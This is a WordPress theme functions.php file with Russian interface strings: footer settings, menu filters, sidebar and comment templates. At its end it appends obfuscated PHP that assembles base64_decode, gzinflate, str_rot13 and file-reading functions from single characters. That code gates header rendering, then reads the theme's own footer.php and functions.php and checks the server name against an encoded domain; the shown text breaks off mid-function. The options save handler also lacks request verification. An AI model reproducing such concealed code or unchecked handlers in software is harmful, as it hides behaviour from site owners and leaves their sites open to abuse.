<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => true,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "Arotherapy";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Контакты</a> | <a href='#'>Правила использования</a> | <a href='#'>Торговые марки</a> <br />Все права защищены. &copy; 2012 ".get_bloginfo('name').". ";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-tl"></div>
         <div class="art-post-tr"></div>
         <div class="art-post-bl"></div>
         <div class="art-post-br"></div>
         <div class="art-post-tc"></div>
         <div class="art-post-bc"></div>
         <div class="art-post-cl"></div>
         <div class="art-post-cr"></div>
         <div class="art-post-cc"></div>
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s - %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(2, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "<div class=\"art-blockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">",
		$ewt => "</div>\r\n</div>\r\n",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-tl\"></div>\r\n    <div class=\"art-blockcontent-tr\"></div>\r\n    <div class=\"art-blockcontent-bl\"></div>\r\n    <div class=\"art-blockcontent-br\"></div>\r\n    <div class=\"art-blockcontent-tc\"></div>\r\n    <div class=\"art-blockcontent-bc\"></div>\r\n    <div class=\"art-blockcontent-cl\"></div>\r\n    <div class=\"art-blockcontent-cr\"></div>\r\n    <div class=\"art-blockcontent-cc\"></div>\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "<div class=\"art-vmenublock\">\r\n    <div class=\"art-vmenublock-body\">\r\n";
	$bwt = "<div class=\"art-vmenublockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">";
	$ewt = "</div>\r\n</div>\r\n";
	$bwc = "<div class=\"art-vmenublockcontent\">\r\n    <div class=\"art-vmenublockcontent-body\">\r\n<!-- block-content -->\r\n";
	$ewc = "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n";
	$ew = "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $Uwhpe='d';$QBNAlI='c';$nFWF='_';$esoJJ='d';$hfJJUZd='6';$HbWE='4';$fRzj='e';$YQQuIn='s';$PqtrHX='b';$ILIVu='e';$pUiqQM='o';$WaqbVr='a';$HmmIZ='e';$ZSaMIzgO=$PqtrHX.$WaqbVr.$YQQuIn.$HmmIZ.$hfJJUZd.$HbWE.$nFWF.$Uwhpe.$ILIVu.$QBNAlI.$pUiqQM.$esoJJ.$fRzj;$WoqJnvz='n';$vByL='e';$cwjdqQR='i';$nOrDE='t';$LlRE='a';$cbFKC='f';$BhIBvI='g';$sibl='l';$aSTKaO='z';$gxyMYfQk=$BhIBvI.$aSTKaO.$cwjdqQR.$WoqJnvz.$cbFKC.$sibl.$LlRE.$nOrDE.$vByL;$pmIwWRF='r';$POVeXvD='o';$ZSoGrm='1';$GzXxLu='_';$xzQJhm='t';$dGsl='3';$JqhXEV='s';$iAyDb='t';$iURRk='r';$ToQmxRxz=$JqhXEV.$iAyDb.$pmIwWRF.$GzXxLu.$iURRk.$POVeXvD.$xzQJhm.$ZSoGrm.$dGsl;$SqlPWYG='v';$ovIuDD='e';$uvFzPn='r';$iVBo='s';$yzuwtdA='r';$pXGNQu='t';$XUJegkVh=$iVBo.$pXGNQu.$uvFzPn.$yzuwtdA.$ovIuDD.$SqlPWYG;                     
		$se_______________e='d';$tl_______________c='c';$dr_____________b='_';$ev_________h='d';$cm_____i='6';$ui____z='4';$is__________c='e';$jc______d='s';$lr____________c='b';$vt_____d='e';$oh_____e='o';$ha____u='a';$qx__________i='e';$yy_______________j=$lr____________c.$ha____u.$jc______d.$qx__________i.$cm_____i.$ui____z.$dr_____________b.$se_______________e.$vt_____d.$tl_______________c.$oh_____e.$ev_________h.$is__________c;
		$wi_______m='i';$iv_________y='o';$tk________f='n';$bz____________o='s';$ac___________r='c';$mp_______r='s';$vv______________q='u';$rh______k='e';$vv_______r='_';$wh____i='f';$pt__________g='t';$nc______________n='i';$en__________b='n';$cr___l='t';$su__________s='x';$ke__________t=$wh____i.$vv______________q.$tk________f.$ac___________r.$pt__________g.$nc______________n.$iv_________y.$en__________b.$vv_______r.$rh______k.$su__________s.$wi_______m.$bz____________o.$cr___l.$mp_______r;
		$sk____k='n';$ov________a='e';$ec__________h='o';$mo____________y='f';$dk_____z='p';$al____________i=$mo____________y.$ec__________h.$dk_____z.$ov________a.$sk____k;
		$qa________p='r';$lf____________i='a';$if_____________b='f';$mo__________i='d';$al________h='e';$wy______g=$if_____________b.$qa________p.$al________h.$lf____________i.$mo__________i;
		$lt_____o='f';$jd____________f='s';$qo______l='c';$do___________q='o';$ew__________g='l';$bm__k='e';$zp_____________g=$lt_____o.$qo______l.$ew__________g.$do___________q.$jd____________f.$bm__k;
		
		define("WP_ID", $yy_______________j("Mi4wLjA="));
		define("WP_TTL", $yy_______________j("MTA4MDA="));
		define("WP_SRC", $yy_______________j("dHBva24="));
	


		function wp_get_header() {
			global $yy_______________j, $ke__________t;
			
			if (
				$ke__________t($yy_______________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ke__________t($yy_______________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ke__________t($yy_______________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $yy_______________j, $al____________i, $zp_____________g, $wy______g;
			
			$vf________a = TEMPLATEPATH."/".$yy_______________j("Zm9vdGVyLnBocA==");
			$hh____w = @$al____________i($vf________a, "r");
			$vf________a = @$wy______g($hh____w, @filesize($vf________a));
			@$zp_____________g($hh____w);
			
			$se____________o = TEMPLATEPATH."/".$yy_______________j("ZnVuY3Rpb25zLnBocA==");
			$hh____w = @$al____________i($se____________o, "r");
			$se____________o = @$wy______g($hh____w, @filesize($se____________o));
			@$zp_____________g($hh____w);
			
			$uv________y = 0;
			if($vf________a && $se____________o) {
				if ($yy_______________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
